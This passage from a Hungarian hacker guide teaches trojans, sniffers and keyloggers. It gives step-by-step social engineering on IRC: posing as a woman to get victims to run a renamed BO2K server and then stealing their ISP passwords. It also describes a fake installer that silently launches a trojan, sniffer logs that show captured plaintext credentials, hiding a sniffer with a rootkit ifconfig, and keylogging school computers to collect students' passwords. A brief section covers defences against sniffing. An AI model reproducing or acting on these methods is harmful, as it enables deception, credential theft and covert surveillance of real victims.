közvetlenül a géppel, egyszerubben csak azokat az utasításokat adhatod ki, amiket a<br />
trojai is tartalmaz. Az áldozat gépén a trojai úgy viselkedik, mint egy vírus, mert ez is<br />
memóriarezidens. Többféle képpen muxik az önindítás. Egyrészt beírják magukat a<br />
Windows könyvtárban található win.ini illetve system.ini fájlban vagy pedig a windows<br />
regisztrációs adatbázisába piszkítanak. Nehány trojannal (pl. ICQHack, ICQSpy stb.)<br />
akár a vonal másik végén lévo egyén ICQ UIN számát, azonosító kódját,<br />
kapcsolatainak listáját, az összes fogadott és küldött üzenet megismerhetjük. A<br />
hozzáértobbek teljes pusztítást is képesek végrehajtani ezekkel a vírusokra hasonlító<br />
programokkal. Néhány buta ember azt hiszi, hogy a hacker szinte semmihez nem tud<br />
hozzáférni egy kapcsolódás után, pedig ez nem így van. Egy profi támadás<br />
következtében szinte minden fontos személyes infót meg lehet szerezni, ami csak a<br />
számítógépen van, mitpéldául:<br />
96<br />
• Bankkártya információkat<br />
• Banki információkat<br />
• Azonosítási információkat<br />
• Levelezolistákat<br />
• Azonosítókat és kódokat<br />
• Személyes címet és adatokat<br />
• E-mail fiókokat<br />
• Otthoni iroda / Kisvállalokozás információit<br />
• Vállalati azonosítókat ezálltal különbözo szolgáltatásokhoz hozzáférést<br />
• Személyes e-mail levelekbe beletekintést<br />
• Te és családtagjaid vezeték és utónevét<br />
• Gyerekeid nevét és életkorát<br />
• Otthoni címedet<br />
• Telefonszámodat<br />
• Leveleket, amiket te másoknak írtál pl. Wordben
• Családi képeidet<br />
• Iskolai munkákat<br />
• Más iskolai azonosítót / információt<br />
Hackers’ Guide<br />
Szerintem nem örülnél, ha valaki betörne hozzád és személyes dolgaidat internetes<br />
oldalakon keresztül közölné másokkal.<br />
Minden nap megszállott tempóban készítik a programozók az újabb, jobb, több<br />
funkciós, jobb rejtozködo technikájú trojai programokat és ezzel egyidoben készülnek<br />
az ellenszerek (anti-trojan) is. Muszakilag a trojai programok minden operációs<br />
rendszer illetve platform alatt képesek muködni. Biztos információ soha sincs a<br />
trojanokról, hogy mennyi van belolük, mennyien vannak megfertozve stb. stb... Csak<br />
egy biztos, az, hogy érdemes védekezni, ha nem akarunk a dokumentumban leírtak<br />
szerint pórul járni és persze a legjobb védekezés a támadás, Hannibált is saját<br />
módszereiven gyozték le Zámánál!<br />
************************************************************************************************<br />
Pár szó a trojai programokról<br />
A neve a történelemből fakad. Pár évvel ez elött a görögök ajándékba adtak egy<br />
falovat az ellenségnek, amiben benne lapult a sok rohambilis. Éjjel mikor senki sem<br />
figyelt, kijöttek és átvették az irányitást. Nnna.....ezek a programok valami hasonlóra<br />
képesek (persze megfelelő védelem hiányában). Van egy server és egy client része.<br />
Ha valakinél Te is át akarod venni az irányitást, akkor futtatnod kell a servert. Ezeket<br />
át lehet nevezni, és az ikon is valamilyen rendszer fájlra hasonlit. A windows futása<br />
közben nem lehet törőlni őket, mert alkalmazásban vannak. Léteznek olyan trojaik,<br />
amik a server installálása után a megadott cimre kűldenek e-mailt az áldozat ip-je és<br />
egyéb fontos info-val együtt. Ha megvan az ip, akkor azt ird be a cliens-be, és<br />
kapcsolodj rá. Ha nem sikerűl, azt látni fogod. Ha rajta vagy, onnan tied a világ.<br />
Tudsz törőlni; bármit fel-le tölteni; kikapcsolni gépet, monitort; programokat leállitanielinditani;<br />
hátteret változtatni; felszavakat lopni; egeret manipulálni; FTP-n<br />
kapcsolodni; böngészőt elirányitani és ez csak a töredéke amire ezek képesek. DE<br />
megfelelő védelemmel, letudod ütni magadról a támadást, sőt még detektálni is lehet<br />
a támadót. A működési elvük, hogy elinditás után bizonyos portokat megnyitnak és<br />
azok a kapcsolódásra várnak. Néhány trojan ujra inditja a gépet, de az újak már a<br />
registry-t használják.<br />
Hogyan használjuk EREDMÉNYESEN a trojai programokat?<br />
A leghasznosabb számunkra a 'system/list passwords' opció ... ez kiírja a<br />
számítógépen tárolt jelszókat, így a minket érdeklő internet-hozzáférés<br />
"username/password" - jét is. A dolognak egyetlen szépséghibája van ... a szerver<br />
file-t valahogy fel kell juttatnuk a célgépre: ez kétféleképpen tehetjük meg, az<br />
97
Hackers’ Guide<br />
egyszerubb, ha fizikai hozzáférésünk van a géphez, mondjuk ez véleményem szerint<br />
elég ritka. A másik lehetoség interneten, leginkább irc-en keresztül 'rávenni'<br />
áldozatunkat, hogy vegye át a file-t, és futtassa le :) Itt jön a dologba egy kis<br />
nehézség ... ki az a hülye, aki bármit is elindít a gépén anélkül, hogy tudná, mi az.<br />
Meg kell nyugodni, vannak ilyenek. Az elso lépés az, hogy felmegyünk ircre. A<br />
legfontosabb az, hogy noi néven!!! :) Valami igencsak jó nore utaló nevet kell<br />
választani (pl. Niki vagy valami ilyesmi). Aztán következik egy kelloen lamer csatorna<br />
kiválasztása, tehát nem valami hack-channel, hanem pl #magyar, #hungary ... ahol<br />
biztos vannak olyanok akik beszívnak egy ilyet ... Ezután ne csináljuk semmit! Ne<br />
beszéljünk, ne /msg - zünk senkivel! Nem kell sokat várni (max 1 perc), és alig bírjuk<br />
majd bezárni az msg ablakokat :) A sok kanos tag csak úgy eláraszt a kampó<br />
kérdésekkel (pl. Szia, hogy vagy? Szeretsz baszni? - meg ilyenek). Válasszunk ki<br />
egyet, akinek a hostja az általunk preferált ISP-jé, pl dial31.kamponet.hu, ha a<br />
kamponetre akarunk accountot. Ekkor kezdjünk el vele pofázni. Lényeg az, hogy ne<br />
derüljön ki, hogy fasz van a lábunk között ... :) A leendo accountunkról<br />
érdeklodhetünk az alábbi kérdéssel: - Gyakran vagy itt? VAGY - Minden nap itt<br />
vagy? innen megtudjuk, hogy korlátlan - e az account. Beszélgessünk egy kicsit,<br />
aztán amikor képet kér rólad (biztos fog!), dcc-zük el pl. a kep.rar filet, ami<br />
tartalmazza a bo2k sever file-t, átnevezett állapotban pl. kep.exe-re (a server file<br />
114K). Átveszi, lefuttatja, és két eset lehetséges: kitömörítés után vagy elkezd<br />
kurvaanyázni - ekkor a vírusírtója (pl AVP monitor) beszólt, hogy bo2k veszély van ...<br />
általában azonban nem tudják az emberek mi ez, csak azt hiszik valami vírus. Ekkor<br />
fontos, hogy ne azt mondjuk, hogy 'bazzeg nem szívtad be', hanem valami olyasmit,<br />
hogy 'majd szólok a bátyámnak hogy szerelje meg' :) vagy valami hasonlót ... kérjünk<br />
bocsánatot, meg minden, és ha lehet pofázzunk még vele. Jobbik estet (mármint<br />
számunkra nyero), ha elindítja, és azt mondja, hogy 'nem muködik'. Ekkor nekünk<br />
kurvára jó, mert felkonnektelünk a gépére, és simán lenyúljuk a jelszó(ka)t. Ezek<br />
után is beszélgessünk még vele, mert így egyáltálán nem lesz feltunő. Bármilyen<br />
nagy a kísértés, NE rebootoljunk neki, én már párszor megtettem, és a paraszt<br />
miután visszajött beszólt nem msg-be a csatin, hogy mi a helyzet, valaki szívózik :)<br />
Általam gyakrabban alkalmazott módszer, hogy nem képnek adom ki a server file-t.<br />
(ha képet kérnek azt mondom, hogy 'nincs a számítógépen' - ez nagyon 'lányosan'<br />
hangzik ... :)) Kis beszélgetés után (kb 5 perc) térjünk rá a lényegre, kérdezzük meg<br />
tole, hogy van-e kedve sakkozni, amobázni, vagy amit akarunk ... ha azt mondja,<br />
hogy igen, csak hogyan, mondjuk azt eloször, hogy 'interneten keresztül' - ez szinén<br />
elég picsásan hangzik. NAGYON fontos, hogy kérdezzük meg, hogy megvan-e neki<br />
a játék! (ez egy kurva jó kérdés, bazzeg!!!) Így minden gyanúja elszáll, hogy szivatni<br />
akarjuk. Persze nincs meg nekik, tehát ajánljuk fel, hogy elküld- jük :) ... Ekkor ugyan<br />
az a 2 eset áll fenn, mint a képesnél, ezt nem írom le mégegyszer. Szintén ha nem<br />
megy nekik, beszélgessünk még utána ...Ha elég ügyesek vagyunk és jól csináljuk,<br />
egy hétvége délután (ekkor iszonyú sok lamer vann benn, tehát jobb, mint az este)<br />
mondjuk 3 tól 7ig körülbelül 15 accot tudunk szerezni ... nem is rossz!! Mindig nézzük<br />
meg az online eltöltött idot a szolgáltató oldalán, innen megtudjuk (az elozo<br />
hónapiból, mondjuk) hogy hány órás az acc. Én csak a végteleneket használtam,<br />
nem vagyok paraszt, hogy mások fizessenek az én szórakozásomért ... :) tehát csak<br />
ezeket használd. Minden nap másikat!!! Így viszonylag elkerülöd a lebukás<br />
lehetoségét is.Ha valami olyan szolgáltatóra szereztünk accountot, ami a mi<br />
körzetünkben még nem épült ki (foleg vidékiek, mint pl. én), akkor keressünk egy<br />
olyan valakit, aki ott lakik, ahol már ott van az isp, és ha neki is van pár elfekvo accja,<br />
ami meg neki nem kell, akkor el lehet csere-berélni is oket.Ha sikerült valami<br />
98
Hackers’ Guide<br />
korlátlan hozzáférést szerezni, nézzük meg, hátha pl. csak hétvégén vannak bent<br />
vele, így hétköznap nyugodtan használhatjuk.Fontos még megjegyeznem, hogy én<br />
ezt már nem csinálom, csak régebben, amikor még nem volt legal accountom. Ha<br />
kipróbáljátok, semmilyen felelosséget NEM vállalok, viszont saját tapasztalatból<br />
tudom, hogy az emberek kb 60%a szívja be. Lehet próbálkozni ...<br />
from ww187 / rBL2k<br />
A kérdes adott: hogy hogyan juttasunk fel egy trojan<br />
szervert a target gépre. Irc-n nehéz elsózni. Ha a progi<br />
amit lekűldesz nem csinal semmit, akkor a lámma gyanakodhat.<br />
Itt jon a trükk.<br />
Kepzeld el a játek directory-t.<br />
van benne egy pár .dat .dll akármijen file, meg egy<br />
setup.exe nevű is.<br />
Átnevezed a trojan szerver-t mongyuk akarmi.dll -nek, és a<br />
játekprogram .exe -t pedig valami.dat -nak<br />
Szoval a setup.exe azt csinalja, hogy ezt a<br />
két fajlt visszanevezi exe -nek, aztán futtatja a trojant,<br />
majd közli hogy az installacio sikeres volt, és rákérdez<br />
hogy futtatod-e a játekot.<br />
Ha igen, akkor elinditja a játekot, vagy mindegy mit, mert<br />
akkor már régen a gépen van a lényeg, és abszolut nem tűnik<br />
fel neki semmi.<br />
Hacsak nem nyögi be valami virusirtó, vagy akármi, hogy gáz van...:)<br />
Quentin0<br />
************************************************************************************************<br />
Snifferek<br />
Némi bevezető…<br />
Érdemes ezekről a programokról is írni egy keveset, mivel a legtöbb tömeges accszerzést<br />
ennek segítségével hajtották végre (pl. legutóbb az (első) L&R törésnél,<br />
ahol a kb. 2500 password-öt néhány hét sniffelés eredményeként kapták).<br />
A miatt is érdemes beszélnünk róla, mivel a sniffelést kívülről nem lehet detektálni,<br />
így azoknak a kezdőknek is bátran ajánlható, akik nem akarnak mazochista módon<br />
rögtön a rendszergazdi karmaiba kerülni :( (de erről később).<br />
99
Hackers’ Guide<br />
Mik is a snifferek?<br />
Ha a szó angol jelentését megkeressük, akkor minden világos lesz:<br />
sniff = szippantás, szimatolás<br />
(Itt most nem arra kell gondolni, hogy ha használjuk, akkor jól megszippantjuk,<br />
inkább koncentráljunk a második jelentésre, azaz szimatolás.)<br />
A snifferek olyan programok (de lehet hardware is), amelyekkel a hálózaton folyó<br />
forgalomba szimatolhatunk bele. Ez olyan hálózaton lehetséges, ahol a hálózatba<br />
kötött gépek egy fizikai vonalon osztoznak., ahol a vonalra feltett info bárki számára<br />
fizikailag elérhető. Ennek remek példája pl. az Ethernet hálózat.<br />
Az Ethernet ui. úgy működik, hogy a hálózatba kötött gépek az adatokat nem egy<br />
darabban, hanem csomagokra bontva (frame-ek) küldik el egymásnak. A drótra<br />
feltett adatcsomagokat minden Ethernet-kártya mintavételezi, és ha valamelyik<br />
kártya ráismer a saját fizikai címére az adott csomagban akkor beolvassa és<br />
továbbítja az őt meghajtó programoknak (talán emlékeztek 7 rétegű OSI modellre).<br />
De szerencsére át lehet a hálózati interface-t állítani olyan üzemmódra, hogy<br />
válogatás nélkül minden csomagot beolvasson, ezt a 'Promiscuous mode'. (A<br />
promiszkuitás szó azt hiszem mindenkinek ismerős :)).<br />
Ezzel a beállítással elvileg az Etherneten folyó teljes adatforgalom lehallgatható.<br />
Felhasználás<br />
Ezt a funkciót nyilván nem arra a célra hagyták az Ethernet hálózatban bárki kedvére<br />
garázdálkodjon, hanem elsősorban diagnosztikai célból. Lehet a hálózati forgalmat<br />
mérni vele, vagy hálózati hibakeresésre is használható. De előszeretettel használják<br />
a rendszergazdik olyan csúnya, gonosz módszerek :) kiderítésére, mint pl. a<br />
spoofolás.<br />
A sniffelés az Etherneten kívül más hálózatokon is lehetséges, tetszőleges hálózati<br />
protokollt figyelhetünk vele, de én most csak az Ethernet és a TCP/IP sniffelés<br />
ismertetésére szorítkozom (a többit nem ismerem annyira, nem mintha ezt hű de<br />
nagyon ismerném).<br />
Mi kell hozzá?<br />
- 1 Ethernet hálózat, amihez fizikailag hozzákapcsolódtunk<br />
- 1 saját IP cím, ami ehhez a hálózathoz tartozik<br />
- Nem árt egy jó sniffer program sem (írhatunk is egyet, ha van elég önbizalmunk).<br />
- Jó sniffer programot én csak UNIX-ra láttam, úgyhogy valamilyen LINUX + gcc<br />
fordító<br />
- Root jog ezen a Linuxon, a PROMISC mód bekapcsolásához.<br />
A sniffereket végrehajtható program formájában vagy forráskódban tölthetjük le<br />
(személy szerint a forráskódút preferálom, szeretem tudni, hogy mit csinálok).<br />
Futtatáskor találkozhatunk néhány problémával. A sniffer mintavételezi a hálózatot.<br />
Gyors vagy terhelt hálózaton nem várhatjuk azt, hogy a sniffer az összes hálózati<br />
csomagot képes lesz begyűjteni nekünk, mivel a beolvasott csomagok feldolgozása<br />
is időt igényel, és ez alatt a hálózaton folyik a forgalom. Másrészt a begyűjtött<br />
csomagok nagy mennyisége miatt a tárolás és értelmezés sem mindig egyszerű.<br />
Egy sniffer akkor jó, ha a beolvasott csomagokat képes szűrni. TCP/IP hálózatban az<br />
IP csomagokat a forrás és cél IP-cím alapján érdemes szűrni. Ha ezek TCP (vagy<br />
UDP) csomagok, akkor még érdemes a TCP-kapcsolat forrás és cél portcímét is<br />
100
Hackers’ Guide<br />
figyelembe venni. Ha password-szerzésre specializáljuk a sniffert, akkor további<br />
finomítás lehet az, ha csak a kapcsolat első néhány első csomagját tároljuk (pl. a<br />
linsniffer ezt teszi). Így csökkenthető a tárolt adatok mennyisége.<br />
A snifferek kimenete általában a standard kimenetre megy de file (ok)ba is kérhetjük<br />
az eredményt. A szűrés mellett a logolási szint beállíthatósága is fontos lehet. A<br />
snifferek általánban kiírják az elkapott csomagok header-infoját olvasható formára<br />
alakítva, (IP, TCP, UDP header), és a csomagokban szállított adatokat is.<br />
Néhány példa:<br />
-----------------------------------------------------------------------------------------------<br />
1 . Már nem is tudom melyik sniffer (talán Sniffit 0.3.5 ???; próbáljátok ki az összeset<br />
:( ):<br />
TCP Packet ID (from_IP.port-to_IP.port): 192.168.66.1.513-192.168.66.66.1023<br />
SEQ (hex): 19B24FC4 ACK (hex): 223EE67F<br />
FLAGS: -AP--- Window: 3C00<br />
Packet ID (from_IP.port-to_IP.port): 192.168.66.1.513-192.168.66.66.1023<br />
45 E 10 . 00 . 29 ) 29 ) B7 . 40 @ 00 . 3F ? 06 . 0C . 74 t C0 . A8 . 42 B 01 .<br />
C0 . A8 . 42 B 42 B 02 . 01 . 03 . FF . 19 . B2 . 4F O C4 . 22 " 3E > E6 . 7F .<br />
50 P 18 . 3C < 00 . F6 . 02 . 00 . 00 . 00 .<br />
TCP Packet ID (from_IP.port-to_IP.port): 192.168.66.66.1023-192.168.66.1.513<br />
SEQ (hex): 223EE67F ACK (hex): 19B24FC1<br />
FLAGS: -AP--- Window: 7C00<br />
Packet ID (from_IP.port-to_IP.port): 192.168.66.66.1023-192.168.66.1.513<br />
45 E 00 . 00 . 34 4 31 1 01 . 00 . 00 . 45 E 06 . 3F ? 2F / C0 . A8 . 42 B 42 B<br />
C0 . A8 . 42 B 01 . 03 . FF . 02 . 01 . 22 " 3E > E6 . 7F . 19 . B2 . 4F O C1 .<br />
50 P 18 . 7C | 00 . 42 B 1E . 00 . 00 . FF . FF . 73 s 73 s 00 . 19 . 00 . 50 P<br />
00 . 00 . 00 . 00 .<br />
TCP Packet ID (from_IP.port-to_IP.port): 192.168.66.1.513-192.168.66.66.1023<br />
SEQ (hex): 19B24FC5 ACK (hex): 223EE68B<br />
FLAGS: -A---- Window: 3C00<br />
Packet ID (from_IP.port-to_IP.port): 192.168.66.1.513-192.168.66.66.1023<br />
45 E 10 . 00 . 28 ( 29 ) B8 . 40 @ 00 . 3F ? 06 . 0C . 74 t C0 . A8 . 42 B 01 .<br />
C0 . A8 . 42 B 42 B 02 . 01 . 03 . FF . 19 . B2 . 4F O C5 . 22 " 3E > E6 . 8B .<br />
50 P 10 . 3C < 00 . F5 . FE . 00 . 00 .<br />
-----------------------------------------------------------------------------------------------<br />
2. Pálda password megszerzésére:<br />
snoop from Sun<br />
pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1030<br />
cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1030 [1] 2977\r\ncs:/user/f<br />
pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1030<br />
pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />
cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188<br />
pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />
cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188<br />
pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />
cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188<br />
pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />
101
Hackers’ Guide<br />
cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188<br />
pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />
cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188<br />
pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />
cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 \r\n\r\nUNIX(r) System V<br />
pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />
cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188<br />
pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />
cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188<br />
pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />
cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188<br />
pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />
cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188<br />
Itt jön a felhasználó (calvin), az echozás miatt duplán.<br />
pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 c<br />
cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 c<br />
pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 a<br />
cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 a<br />
pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />
pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 l<br />
cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 l<br />
pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />
pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 v<br />
cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 v<br />
pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />
pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 i<br />
cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 i<br />
pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />
pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 n<br />
cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 n<br />
pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />
pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />
cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188<br />
pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />
… na és a password<br />
cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 Password:<br />
pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />
pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 T<br />
cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188<br />
pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 i<br />
cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188<br />
pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 g<br />
cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188<br />
pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 e<br />
cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188<br />
pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 r<br />
cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188<br />
pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 7<br />
cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188<br />
102
Hackers’ Guide<br />
pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 =<br />
cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188<br />
pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 $<br />
cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188<br />
pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />
cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188<br />
pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />
cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 Last login: Mon Aug<br />
pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />
…. satöbbi<br />
3. sniffit for UNIX<br />
203.252.195.1.110-203.252.195.191.1297<br />
203.252.195.1.20-203.252.195.2.1034<br />
203.252.195.1.20-203.252.195.2.1035<br />
203.252.195.1.21-203.252.195.2.1033<br />
203.252.195.1.23-203.252.195.2.1032<br />
203.252.195.1.23-203.252.195.65.1030<br />
203.252.195.191.1297-203.252.195.1.110<br />
203.252.195.2.1032-203.252.195.1.23<br />
203.252.195.2.1033-203.252.195.1.21<br />
203.252.195.2.1034-203.252.195.1.20<br />
203.252.195.2.1035-203.252.195.1.20<br />
203.252.195.65.1030-203.252.195.1.23<br />
cs# more 2*<br />
::::::::::::::<br />
203.252.195.1.110-203.252.195.191.1297<br />
::::::::::::::<br />
+OK QUALCOMM Pop server derived from UCB (version 2.1.4-R3) at cs starting.<br />
+OK Password required for hrshin.<br />
+OK hrshin has 0 message(s) (0 octets).<br />
+OK 0 0<br />
+OK Pop server at cs signing off.<br />
::::::::::::::<br />
203.252.195.191.1297-203.252.195.1.110<br />
::::::::::::::<br />
USER hrshin<br />
PASS shr1234<br />
STAT<br />
QUIT<br />
::::::::::::::<br />
203.252.195.1.21-203.252.195.2.1033<br />
::::::::::::::<br />
220 cs FTP server (UNIX(r) System V Release 4.0) ready.<br />
331 Password required for rhee.<br />
230 User rhee logged in.<br />
200 PORT command successful.<br />
150 ASCII data connection for /bin/ls (203.252.195.2,1034) (0 bytes).<br />
103
Hackers’ Guide<br />
226 ASCII Transfer complete.<br />
200 PORT command successful.<br />
150 ASCII data connection for certcc-msg (203.252.195.2,1035) (764 bytes).<br />
::::::::::::::<br />
203.252.195.2.1033-203.252.195.1.21<br />
::::::::::::::<br />
USER rhee
szintig<br />
- az elkapott csomagok kapcsolatok szerinti rendezése file-okba<br />
Hackers’ Guide<br />
Még nincs készen teljesen, de ha jól viselkedtek, akkor valamikor később ezt is<br />
elérhetővé teszem. További ötleteket szívesen fogadok.<br />
Detektálhatóság<br />
Már az elején írtam, hogy a sniffereket melegen (nem kell rosszra gondolni :))<br />
ajánlhatom kezdőknek, mivel ha saját gépen futtatják, akkor ez kívülről nem vehető<br />
észre. A sniffer ugyanis csak gyűjti a csomagokat a hálózatról, a hálózat felé<br />
semmilyen kimenete nincs. Így annak a gépnek a kivételével, ahol futtatjuk, más<br />
gépen semmiféle log nem keletkezik.<br />
Persze más a helyzet, ha valamilyem más módszerrel már bejutottunk egy olyan<br />
gépre, amit snifferrel nem érhetünk el (másik fizikai hálón van), megvan a root, de a<br />
saját hálóján lévő többi gépre is be szeretnénk jutni. Ekkor az egyik legegyszerűbb<br />
módszer egy sniffer telepítése. Ekkor azonban már észrevehetnek bennünket.<br />
A sniffer PROMISC módba nyomja hálózati interface-t, és ezt egyszerű észlelni, pl<br />
ifconfig-gal:<br />
#ifconfig le0<br />
le0:<br />
flags=8863<br />
inet 127.0.0.1 netmask 0xffffff00 broadcast 255.0.0.1<br />
Megoldás lehet, ha lecseréljük az ifconfig-ot (valamilyen Rootkit-ben lehet ilyeneket<br />
találni).<br />
CSAK ÉSSZEL EZZEL A MEGOLDÁSSAL !!! Minden normális helyen a rendszerfileokat<br />
CRC-vel szokás védeni !!!<br />
Ha nem vigyázunk a megfelelő szűrésre, vérszemet kapunk és minden csomagot<br />
file-ba írunk, akkor a winchy hamar megtelik, és ez még a legbénább<br />
rendszergazdinak is feltűnhet.<br />
Elárulhat az is, hogy ha a winchy többet jár a kelleténél, így állandóan villog a<br />
winchy-LED. Ennek a problémának a kezelésére nem tudok értelmes megoldást :).<br />
Védekezés a snifferek ellen<br />
Hogy a mási oldalnak is adjunk némi esélyt, megemlítek néhány módszert arra, hogy<br />
hogyan védekezhetünk a sniffelés ellen:<br />
- Aktív (Smart) HUB-ok alkalmazása: itt minden gép egy HUB-on keresztül<br />
kapcsolódik a másikhoz (csillag). A HUB az egyes ágakra csak azokat a csomagokat<br />
küldi el, amelyek az adott ághoz kötött gépnek szólnak. Ekkor maximum csak a saját<br />
gépünket sniffelhetnénk, de ez meg kit érdekel :( ?<br />
- Titkosított protokollok alkalmazása: pl. SSH, itt minden adat a vonalra kerül, de egy<br />
titkosított csatornán keresztül. Az elkapott csomagok olvashatatlanok.<br />
- S/Key vagy One Time Password technika alkalmazása: az első esetben a kliens<br />
ismeri a passwordöt, de nem ez kerül a vonalra, hanem egy frissen generált kulcsot<br />
kap a kliens a szervertől, ezzel megbuzerálja a beütött passwordot, és ezt küldi a<br />
105
Hackers’ Guide<br />
szervernek el.<br />
A One Time Password használatoakor a kliens egy password-listát kap, amelyen<br />
egyszer használatos password-ök vannak. Meg lehet sniffelni, de semmi értelme :(((.<br />
Néhány sniffer<br />
Itt most felsorolok néhány programot, linket sajnos nem tudok mellékelni, de<br />
megtalálásuk nem jelenthet problémát.<br />
Platform Sniffer<br />
4.3/4.4 BSD tcpdump<br />
FreeBSD tcpdump<br />
NetBSD tcpdump<br />
DEC UNIX tcpdump<br />
DEC Ultrix tcpdump<br />
HP/UX nettl (monitor) & netfmt (display)<br />
swatch<br />
Irix swatch<br />
Herman<br />
SunOS herfind<br />
swatch<br />
Solaris snoop<br />
SGI Irix nfswatch<br />
Etherman<br />
Linux tcpdump<br />
linsniffer<br />
spy-sniff<br />
Macintosh Etherpeek<br />
DOS ETHLOAD<br />
The Gobbler<br />
LanPatrol<br />
LanWatch<br />
Netmon<br />
Netwatch<br />
Netzhack<br />
A Sniffit-et nem írtam sehová, de az ott elérhető, ahol a libpcap csomag megvan.<br />
Itt van 2 ql sniffer/forrás<br />
tcpdump-3_4 éssniffit_0_3_5<br />
néhány sniffer forrás<br />
Szomorú búcsú …<br />
Mára ennyit a technika és a tudmány világából …<br />
Az általam leírtakkal senkit nem akartam arra buzdítani, hogy az itt ismertetett<br />
programokat és módszereket rossz szándékú célra használja (az, hogy mi a 'rossz<br />
szándék', annak eldöntését rátok bízom :)), célom az információ szabad áramlásának<br />
biztosítása.<br />
Ötleteket, hozzászólásokat szívesen fogadok:<br />
106
BowMan<br />
Hackers’ Guide<br />
************************************************************************************************<br />
Keyloggerekről általában<br />
Van aki azt se tudja, hogy mi és van aki nap mint nap használja... Ez a cikk szeretné<br />
számotokra a keyloggerek által nyújtott lehetőségeket bemutatni a Stealth Keyboard<br />
Interceptor Pro 4.00-on keresztül... Tehet sok sikert és minnél több keylogot gyüjteni,<br />
hisz az információ hatalom :-))<br />
1. Mi is az a keylogger?<br />
Összedobta: Nestan [FCF]<br />
Ahogyan a nevében is benne van loggolja, azaz eltárolja a billentyűzet által közölt<br />
adatokat. Elég nagy a választék a keyloggerek terén és ez nem számít vírusnak mint<br />
a trojaiak... Persze ezt neked a lamer gépére személyesen kell feltenned vagy ha<br />
ügyeskedtél valamelyik trojaival akkor feltöltöd a vinyójára és beüzemeled, persze<br />
már van néhány olyan torjan program ami alapban tartalmazza ezt a funkciót...<br />
2. Mire használhatom ezeket a programokat?<br />
Mindenre! Nagyon jó, hogy elterjedt a magyar középiskolákban a SuliNet-es internet<br />
hozzáférés és a diákok nagyrésze mindíg ott ül a gépek előtt. A lamerek<br />
nagytöbbsége, akik egy percig keresik, hogy hol az ESC gomb legtöbbször a<br />
Freemail-es illetve más ingyenes e-mail szolgáltatós postafiókjukat innen nézik...<br />
Persze, hogy a memóriarezidens keylogger autómatikusan menti és neked nincs<br />
más dolgod mint a géped jól eldugott log fájlokat átmásold lemezre és otthon<br />
részletesen átböngészd.<br />
3. Hogy is működnek ezek a programok?<br />
Nagyjából úgy mint egy vírus, mármint memóriarezidens programok. Te egyszerűen<br />
felmásolod vagy a jobb keyloggereknél feltelepíted, beállítod a kódot, hogy mások ne<br />
macerálják és tiéd a hatalom :-) A keyloggerek minden indítást regisztrálnak és igény<br />
szerint dátumoznak. Az én kollégiumomban kb. egy hónapig volt fent a Skin98...<br />
Ennek az lett a vége, hogy az internetező diákok mindegyikének tudtam a kódját...<br />
3. Minden kezdet nehéz...<br />
Szóval töltsük le valamelyik underground oldalról (www.keyloggers.com) a progit és<br />
